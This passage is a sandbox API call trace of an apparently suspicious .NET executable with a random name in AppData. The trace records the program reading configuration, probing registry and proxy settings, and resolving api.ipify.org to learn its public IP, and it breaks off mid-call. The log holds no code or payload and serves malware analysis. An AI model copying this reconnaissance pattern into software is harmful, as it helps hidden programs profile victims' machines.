lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x189978, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0126.800] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x189ecc | out: lpFileInformation=0x189ecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92785300, ftCreationTime.dwHighDateTime=0x1cd5d48, ftLastAccessTime.dwLowDateTime=0x346650f0, ftLastAccessTime.dwHighDateTime=0x1d2f186, ftLastWriteTime.dwLowDateTime=0x92785300, ftLastWriteTime.dwHighDateTime=0x1cd5d48, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0126.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x189904, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0126.801] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x189df8) returned 1 [0126.801] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x228 [0126.802] GetFileType (hFile=0x228) returned 0x1 [0126.802] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x189df4) returned 1 [0126.802] GetFileType (hFile=0x228) returned 0x1 [0126.819] GetFileSize (in: hFile=0x228, lpFileSizeHigh=0x189ec0 | out: lpFileSizeHigh=0x189ec0*=0x0) returned 0x8c8f [0126.819] ReadFile (in: hFile=0x228, lpBuffer=0x2665b50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x189e7c, lpOverlapped=0x0 | out: lpBuffer=0x2665b50*, lpNumberOfBytesRead=0x189e7c*=0x1000, lpOverlapped=0x0) returned 1 [0126.842] ReadFile (in: hFile=0x228, lpBuffer=0x2665b50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x189d18, lpOverlapped=0x0 | out: lpBuffer=0x2665b50*, lpNumberOfBytesRead=0x189d18*=0x1000, lpOverlapped=0x0) returned 1 [0126.848] ReadFile (in: hFile=0x228, lpBuffer=0x2665b50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x189bcc, lpOverlapped=0x0 | out: lpBuffer=0x2665b50*, lpNumberOfBytesRead=0x189bcc*=0x1000, lpOverlapped=0x0) returned 1 [0126.849] ReadFile (in: hFile=0x228, lpBuffer=0x2665b50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x189bcc, lpOverlapped=0x0 | out: lpBuffer=0x2665b50*, lpNumberOfBytesRead=0x189bcc*=0x1000, lpOverlapped=0x0) returned 1 [0126.849] ReadFile (in: hFile=0x228, lpBuffer=0x2665b50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x189bcc, lpOverlapped=0x0 | out: lpBuffer=0x2665b50*, lpNumberOfBytesRead=0x189bcc*=0x1000, lpOverlapped=0x0) returned 1 [0126.849] ReadFile (in: hFile=0x228, lpBuffer=0x2665b50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x189b04, lpOverlapped=0x0 | out: lpBuffer=0x2665b50*, lpNumberOfBytesRead=0x189b04*=0x1000, lpOverlapped=0x0) returned 1 [0126.853] ReadFile (in: hFile=0x228, lpBuffer=0x2665b50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x189c80, lpOverlapped=0x0 | out: lpBuffer=0x2665b50*, lpNumberOfBytesRead=0x189c80*=0x1000, lpOverlapped=0x0) returned 1 [0126.854] ReadFile (in: hFile=0x228, lpBuffer=0x2665b50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x189b94, lpOverlapped=0x0 | out: lpBuffer=0x2665b50*, lpNumberOfBytesRead=0x189b94*=0x1000, lpOverlapped=0x0) returned 1 [0126.854] ReadFile (in: hFile=0x228, lpBuffer=0x2665b50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x189b94, lpOverlapped=0x0 | out: lpBuffer=0x2665b50*, lpNumberOfBytesRead=0x189b94*=0xc8f, lpOverlapped=0x0) returned 1 [0126.854] ReadFile (in: hFile=0x228, lpBuffer=0x2665b50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x189c54, lpOverlapped=0x0 | out: lpBuffer=0x2665b50*, lpNumberOfBytesRead=0x189c54*=0x0, lpOverlapped=0x0) returned 1 [0126.855] CloseHandle (hObject=0x228) returned 1 [0126.856] GetCurrentProcess () returned 0xffffffff [0126.856] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18a000 | out: TokenHandle=0x18a000*=0x228) returned 1 [0126.856] GetCurrentProcess () returned 0xffffffff [0126.856] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18a000 | out: TokenHandle=0x18a000*=0x22c) returned 1 [0126.857] GetCurrentProcess () returned 0xffffffff [0126.857] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x189ecc | out: TokenHandle=0x189ecc*=0x230) returned 1 [0126.857] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe.config" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\appdata\\sjfhjjskfsf.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x189ecc | out: lpFileInformation=0x189ecc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0126.857] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe.config", nBufferLength=0x105, lpBuffer=0x189978, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe.config", lpFilePart=0x0) returned 0x40 [0126.858] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe.config" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\appdata\\sjfhjjskfsf.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x189ecc | out: lpFileInformation=0x189ecc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0126.858] GetCurrentProcess () returned 0xffffffff [0126.858] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18a000 | out: TokenHandle=0x18a000*=0x234) returned 1 [0126.858] GetCurrentProcess () returned 0xffffffff [0126.858] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18a000 | out: TokenHandle=0x18a000*=0x238) returned 1 [0126.941] GetCurrentProcess () returned 0xffffffff [0126.941] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x189dc8 | out: TokenHandle=0x189dc8*=0x23c) returned 1 [0126.951] GetCurrentProcess () returned 0xffffffff [0126.951] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x189dd8 | out: TokenHandle=0x189dd8*=0x240) returned 1 [0126.987] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x244 [0126.987] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x248 [0126.998] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x1892fc | out: phkResult=0x1892fc*=0x24c) returned 0x0 [0126.998] RegQueryValueExW (in: hKey=0x24c, lpValueName="InstallationType", lpReserved=0x0, lpType=0x18931c, lpData=0x0, lpcbData=0x189318*=0x0 | out: lpType=0x18931c*=0x1, lpData=0x0, lpcbData=0x189318*=0xe) returned 0x0 [0126.998] RegQueryValueExW (in: hKey=0x24c, lpValueName="InstallationType", lpReserved=0x0, lpType=0x18931c, lpData=0x2681cc4, lpcbData=0x189318*=0xe | out: lpType=0x18931c*=0x1, lpData="Client", lpcbData=0x189318*=0xe) returned 0x0 [0126.999] RegCloseKey (hKey=0x24c) returned 0x0 [0127.018] GetCurrentProcess () returned 0xffffffff [0127.018] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x188f08 | out: TokenHandle=0x188f08*=0x24c) returned 1 [0127.029] GetCurrentProcess () returned 0xffffffff [0127.029] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x188f18 | out: TokenHandle=0x188f18*=0x250) returned 1 [0127.040] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\AppContext", ulOptions=0x0, samDesired=0x20019, phkResult=0x188be0 | out: phkResult=0x188be0*=0x0) returned 0x2 [0127.089] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x18a0f8 | out: phkResult=0x18a0f8*=0x254) returned 0x0 [0127.090] RegQueryValueExW (in: hKey=0x254, lpValueName="SchUseStrongCrypto", lpReserved=0x0, lpType=0x18a114, lpData=0x0, lpcbData=0x18a110*=0x0 | out: lpType=0x18a114*=0x0, lpData=0x0, lpcbData=0x18a110*=0x0) returned 0x2 [0127.090] RegCloseKey (hKey=0x254) returned 0x0 [0127.112] GetCurrentProcess () returned 0xffffffff [0127.112] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x189d6c | out: TokenHandle=0x189d6c*=0x254) returned 1 [0127.114] GetCurrentProcess () returned 0xffffffff [0127.114] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x189d7c | out: TokenHandle=0x189d7c*=0x258) returned 1 [0127.117] QueryPerformanceFrequency (in: lpFrequency=0x258978 | out: lpFrequency=0x258978*=100000000) returned 1 [0127.123] GetCurrentProcess () returned 0xffffffff [0127.123] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x189d4c | out: TokenHandle=0x189d4c*=0x25c) returned 1 [0127.126] GetCurrentProcess () returned 0xffffffff [0127.126] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x189d5c | out: TokenHandle=0x189d5c*=0x260) returned 1 [0127.129] GetCurrentProcess () returned 0xffffffff [0127.129] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18a068 | out: TokenHandle=0x18a068*=0x264) returned 1 [0127.144] CoTaskMemAlloc (cb=0xcc0) returned 0x4beed10 [0127.144] RasEnumConnectionsW (in: param_1=0x4beed10, param_2=0x18a078, param_3=0x18a07c | out: param_1=0x4beed10, param_2=0x18a078, param_3=0x18a07c) returned 0x0 [0127.151] CoTaskMemFree (pv=0x4beed10) [0127.157] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x189e60 | out: lpWSAData=0x189e60) returned 0 [0127.164] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x2a8 [0127.173] setsockopt (s=0x2a8, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0127.173] closesocket (s=0x2a8) returned 0 [0127.173] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x2a8 [0127.176] setsockopt (s=0x2a8, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0127.176] closesocket (s=0x2a8) returned 0 [0127.176] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x2a8 [0127.177] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2ac [0127.177] ioctlsocket (in: s=0x2a8, cmd=-2147195266, argp=0x18a080 | out: argp=0x18a080) returned 0 [0127.178] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x2b0 [0127.178] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2b4 [0127.178] ioctlsocket (in: s=0x2b0, cmd=-2147195266, argp=0x18a080 | out: argp=0x18a080) returned 0 [0127.178] WSAIoctl (in: s=0x2a8, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x18a068, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x18a068, lpOverlapped=0x0) returned -1 [0127.179] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x189d98, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0127.182] WSAEventSelect (s=0x2a8, hEventObject=0x2ac, lNetworkEvents=512) returned 0 [0127.182] WSAIoctl (in: s=0x2b0, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x18a068, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x18a068, lpOverlapped=0x0) returned -1 [0127.182] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x189d98, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0127.182] WSAEventSelect (s=0x2b0, hEventObject=0x2b4, lNetworkEvents=512) returned 0 [0127.182] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2bc [0127.183] RasConnectionNotificationW (param_1=0xffffffff, param_2=0x2bc, param_3=0x3) returned 0x0 [0127.187] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x18a094 | out: phkResult=0x18a094*=0x2d4) returned 0x0 [0127.187] RegOpenKeyExW (in: hKey=0x2d4, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x18a044 | out: phkResult=0x18a044*=0x2d8) returned 0x0 [0127.188] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2dc [0127.188] RegNotifyChangeKeyValue (hKey=0x2d8, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x2dc, fAsynchronous=1) returned 0x0 [0127.188] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x18a048 | out: phkResult=0x18a048*=0x2e0) returned 0x0 [0127.188] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2e4 [0127.189] RegNotifyChangeKeyValue (hKey=0x2e0, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x2e4, fAsynchronous=1) returned 0x0 [0127.189] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x18a048 | out: phkResult=0x18a048*=0x2e8) returned 0x0 [0127.189] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2ec [0127.189] RegNotifyChangeKeyValue (hKey=0x2e8, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x2ec, fAsynchronous=1) returned 0x0 [0127.189] GetCurrentProcess () returned 0xffffffff [0127.189] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18a03c | out: TokenHandle=0x18a03c*=0x2f0) returned 1 [0127.191] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x189948 | out: phkResult=0x189948*=0x2f4) returned 0x0 [0127.191] RegQueryValueExW (in: hKey=0x2f4, lpValueName="LegacyWPADSupport", lpReserved=0x0, lpType=0x189964, lpData=0x0, lpcbData=0x189960*=0x0 | out: lpType=0x189964*=0x0, lpData=0x0, lpcbData=0x189960*=0x0) returned 0x2 [0127.191] RegCloseKey (hKey=0x2f4) returned 0x0 [0127.300] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x4be86a8 [0127.369] WinHttpSetTimeouts (hInternet=0x4be86a8, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1 [0127.370] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x18a048 | out: pProxyConfig=0x18a048) returned 1 [0127.726] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.HttpWebRequest_Disabled", lpBuffer=0x1898c0, nSize=0x80 | out: lpBuffer="뮜猡馄\x18㋄璗￿￿飼\x18륔瑔礐猠⫬獖疽瑂畍젝礐猠⫬獖\x02") returned 0x0 [0127.726] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.HttpWebRequest_MinCount", lpBuffer=0x1898c0, nSize=0x80 | out: lpBuffer="뮜猡馄\x18㋄璗￿￿飼\x18륔瑔礐猠⫬獖疽瑂畍젝礐猠⫬獖\x02") returned 0x0 [0127.728] EtwEventRegister () returned 0x0 [0127.746] GetCurrentProcess () returned 0xffffffff [0127.746] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x189d14 | out: TokenHandle=0x189d14*=0x338) returned 1 [0127.748] GetCurrentProcess () returned 0xffffffff [0127.748] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x189d24 | out: TokenHandle=0x189d24*=0x348) returned 1 [0127.758] SystemFunction041 (in: Memory=0x77c10c, MemorySize=0x10, OptionFlags=0x0 | out: Memory=0x77c10c) returned 0x0 [0127.816] SetEvent (hEvent=0x244) returned 1 [0127.857] GetCurrentProcess () returned 0xffffffff [0127.857] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x189c90 | out: TokenHandle=0x189c90*=0x36c) returned 1 [0127.857] GetCurrentProcess () returned 0xffffffff [0127.858] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x189ca0 | out: TokenHandle=0x189ca0*=0x370) returned 1 [0127.858] SetEvent (hEvent=0x244) returned 1 [0127.877] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0x189ffc | out: pFixedInfo=0x0, pOutBufLen=0x189ffc) returned 0x6f [0127.912] LocalAlloc (uFlags=0x0, uBytes=0x248) returned 0x4b16cb0 [0127.912] GetNetworkParams (in: pFixedInfo=0x4b16cb0, pOutBufLen=0x189ffc | out: pFixedInfo=0x4b16cb0, pOutBufLen=0x189ffc) returned 0x0 [0127.927] LocalFree (hMem=0x4b16cb0) returned 0x0 [0127.928] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.Connection_Disabled", lpBuffer=0x189804, nSize=0x80 | out: lpBuffer="ꑂ瑔") returned 0x0 [0127.928] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.Connection_MinCount", lpBuffer=0x189804, nSize=0x80 | out: lpBuffer="ꑂ瑔") returned 0x0 [0127.931] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x388 [0128.284] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x384 [0128.285] GetAddrInfoW (in: pNodeName="api.ipify.org", pServiceName=0x0, pHints=0x189eec*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x189e94 | out: ppResult=0x189e94*=0x4b1f768*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="elb097307-934924932.us-east-1.elb.amazonaws.com", ai_addr=0x4b1d6f0*(sa_family=2, sin_port=0x0, sin_addr="54.225.195.221"), ai_next=0x4b1f7e0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b1d7c8*(sa_family=2, sin_port=0x0, sin_addr="174.129.255.253"), ai_next=0x4b1fab0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b1d7e0*(sa_family=2, sin_port=0x0, sin_addr="54.235.136.99"), ai_next=0x4b1fad8*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b1d828*(sa_family=2, sin_port=0x0, sin_addr="23.21.203.47"), ai_next=0x4b1fb00*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b1d7f8*(sa_family=2, sin_port=0x0, sin_addr="54.225.191.113"), ai_next=0x4b1fb28*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b1d810*(sa_family=2, sin_port=0x0, sin_addr="54.235.182.194"), ai_next=0x4b1fb50*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b1d870*(sa_family=2, sin_port=0x0, sin_addr="23.21.203.116"), ai_next=0x4b1fb78*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b1d858*(sa_family=2, sin_port=0x0, sin_addr="174.129.214.20"), ai_next=0x0))))))))) returned 0 [0128.366] FreeAddrInfoW (pAddrInfo=0x4b1f768*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="elb097307-934924932.us-east-1.elb.amazonaws.com", ai_addr=0x4b1d6f0*(sa_family=2, sin_port=0x0, sin_addr="54.225.195.221"), ai_next=0x4b1f7e0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b1d7c8*(sa_family=2, sin_port=0x0, sin_addr="174.129.255.253"), ai_next=0x4b1fab0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b1d7e0*(sa_family=2, sin_port=0x0, sin_addr="54.235.136.99"), ai_next=0x4b1fad8*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b1d828*(sa_family=2, sin_port=0x0, sin_addr="23.21.203.47"), ai_next=0x4b1fb00*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b1d7f8*(sa_family=2, sin_port=0x0, sin_addr="54.225.191.113"), ai_next=0x4b1fb28*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b1d810*(sa_family=2, sin_port=0x0, sin_addr="54.235.182.194"), ai_next=0x4b1fb50*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b1d870*(sa_family=2, sin_port=0x0, sin_addr="23.21.203.116"), ai_next=0x4b1fb78*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b1d858*(sa_family=2, sin_port=0x0, sin_addr="174.129.214.20"), ai_next=0x0))))))))) [0128.367] GetAddrInfoW (in: pNodeName="api.ipify.org", pServiceName=0x0, pHints=0x189eec*(ai_flags=131072, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x189e94 | out: ppResult=0x189e94*=0x4b1fb78*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="api.ipify.org", ai_addr=0x4b1d858*(sa_family=2, sin_port=0x0, sin_addr="54.225.195.221"), ai_next=0x4b1fb28*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b1d870*(sa_family=2, sin_port=0x0, sin_addr="174.129.255.253"), ai_next=0x4b1fb00*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b1d840*(sa_family=2, sin_port=0x0, sin_addr="54.235.136.99"), ai_next=0x4b1fad8*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b1d810*(sa_family=2, sin_port=0x0, sin_addr="23.21.203.47"), ai_next=0x4b1fab0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b1d7f8*(sa_family=2, sin_port=0x0, sin_addr="54.225.191.113"), ai_next=0x4b1f7e0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b1d828*(sa_family=2, sin_port=0x0, sin_addr="54.235.182.194"), ai_next=0x4b1f768*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b1d7e0*(sa_family=2, sin_port=0x0, sin_addr="23.21.203.116"), ai_next=0x4b1f9e8*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b1d7c8*(sa_family=2, sin_port=0x0, sin_addr="174.129.214.20"), ai_next=0x0))))))))) returned 0 [0128.369] FreeAddrInfoW (pAddrInfo=0x4b1fb78*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="api.ipify.org", ai_addr=0x4b1d858*(sa_family=2, sin_port=0x0, sin_addr="54.225.195.221"), ai_next=0x4b1fb28*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b1d870*(sa_family=2, sin_port=0x0, sin_addr="174.129.255.253"), ai_next=0x4b1fb00*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b1d840*(sa_family=2, sin_port=0x0, sin_addr="54.235.136.99"), ai_next=0x4b1fad8*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b1d810*(sa_family=2, sin_port=0x0, sin_addr="23.21.203.47"), ai_next=0x4b1fab0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b1d7f8*(sa_family=2, sin_port=0x0, sin_addr="54.225.191.113"), ai_next=0x4b1f7e0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b1d828*(sa_family=2, sin_port=0x0, sin_addr="54.235.182.194"), ai_next=0x4b1f768*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b1d7e0*(sa_family=2, sin_port=0x0, sin_addr="23.21.203.116"), ai_next=0x4b1f9e8*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b1d7c8*(sa_family=2, sin_port=0x0, sin_addr="174.129.214.20"), ai_next=0x0))))))))) [0128.370] WSASocketW (af=2, type=2, protocol=0, 